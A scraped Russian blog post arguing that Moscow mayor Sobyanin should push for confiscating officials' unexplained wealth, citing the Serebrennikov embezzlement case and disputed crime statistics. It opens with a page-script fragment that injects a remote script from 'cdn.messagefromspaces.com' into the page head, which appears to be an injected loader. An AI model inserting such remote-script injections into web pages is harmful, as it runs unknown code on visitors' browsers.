, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

А, если методы мэра Москвы, Сергея Собянина применить и в сфере хищения бюджета?

13 Ноя

Совсем недавно мэр Москвы поделился https://www.sobyanin.ru/kak-sdelat-moskvu-bezopasnee   опытом противодействия преступности в Москве.

Он считает, что региональные власти могут создавать условия, в которых совершать преступления становится невыгодно и неудобно.

Для противодействия уличной преступности в Москве  запустили программу улучшения городского освещения. Москва вошла в ТОП-5 самых освещенных городов мира. Это привело к снижению грабежей  более чем в три раза.

Снизить в три раза кражи автомобилей, позволило дополнение в систему видеофиксации нарушений ПДД функцией распознавания машин, находящихся в розыске.

Подключение к единой городской системе видеонаблюдения  более 160 тыс. камер в подъездах, дворах, школах и общественных местах, а также  развитие функции распознавания лиц, позволило почти в пять раз снизить количество квартирных краж.

При этом следует учитывать, что официальная статистика, не соответствует действительности  https://echo.msk.ru/blog/advokatvladimir/2312538-echo/

Гарант Конституции Владимир Путин публично рассказывал, как в 2014 годе обобрали 200 000 предпринимателей, а в 2015 году уже более 230 000. Сколько среди них было работающих в Москве, умалчивают.

В несоответствии статистике фактическим обстоятельствам с преступностью в Москве, мог удостовериться  сам  Собянин, если бы  инкогнито побывал на базарах Москвы,  в дни собирания дани с предпринимателей и фермеров.

Он мог бы увидеть, что в Москве совершается значительно больше вымогательств, чем фактически их фиксируют. Поэтому есть все основания полагать, что 140 тыс. преступлений совершаются в Москве не в год, как его убеждают,  а в месяц.

Но, как может мэр Москвы противодействовать преступлениям,  связанным с  разворовыванием бюджетных средств?

Например, в Мещанском суде продолжается допрос режиссёра Кирилла Серебренникова, который отвергает обвинения следствия в том, что он похитил бюджетные средства при реализации проекта «Платформа».

Следствие же уверено https://govoritmoskva.ru/news/179648/?fbclid=IwAR2wRYs_QpaUM_7hxugiDiiubTNrpurEO3IBrQxfhLSq8mx4cFECMWsYoso   , что Серебренников, а также экс-директор «Гоголь-центра» Алексей Малобродский и продюсер Юрий Итин похитили 133 из 214 млн рублей, выделенных в 2011—2014 годах некоммерческой организации «Седьмая студия» на развитие и популяризацию современного искусства России в рамках проекта «Платформа». Свою вину все отрицают, кроме давшей показания против других фигурантов экс-бухгалтера компании Нины Масляевой.

Но всего этого можно было бы избежать, если пойти дальше и не только  создавать условия, в которых совершать преступления становится невыгодно и неудобно, но и пользоваться теми благами, что достаются в результате совершения преступлений, должно быть неудобно и невозможно.

Законодательно такие меры существуют уже седьмой год, но действуют избирательно.

Я имею в виду п.п. 8 п. 2 статьи 235 ГК РФ, позволяющей изымать у чиновников собственность, чьи официальные доходы явно недостаточны для обладания ею.

Пока сбором материалов для применения этой нормы наделена только Администрация Президента. Даже почему-то Генеральная прокуратура лишена права делать такую работу.

Несмотря на то, что в каждом регионе россияне видят, как жируют чиновники, Владимир Путин не уделяет должного внимания  имуществу «сомнительного происхождения»  своих назначенцев.

Такое бездействие привело к тому, что уже региональные https://ria.ru/society/20181105/1532155036.html   чиновники становятся в 29 лет обладателями имущества «сомнительного происхождения».

В этой связи, мэр Москвы мог бы выйти с инициативой осуществлять сбор материалов  по применению п.п. 8 п. 2 статьи 235 ГК РФ теми сотрудниками МВД, которых надо сокращать, из-за того, что количество некоторых преступлений в Москве уменьшилось в разы. Уверен, что в Московских судах с реализацией этих материалов проблем не будет.

Польза будет  огромной не только для Москвы, но и для страны. За год бюджет страны пополнится в разы, а совершать корыстные преступления перестанут все, не только чиновники. Поскольку похищенным воспользоваться будет невозможно, всё отберут да ещё на весь Мир опозорят.

Полагаю, что при реализации таких мер следующим Президентом России станет именно Сергей  Семёнович Собянин.

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.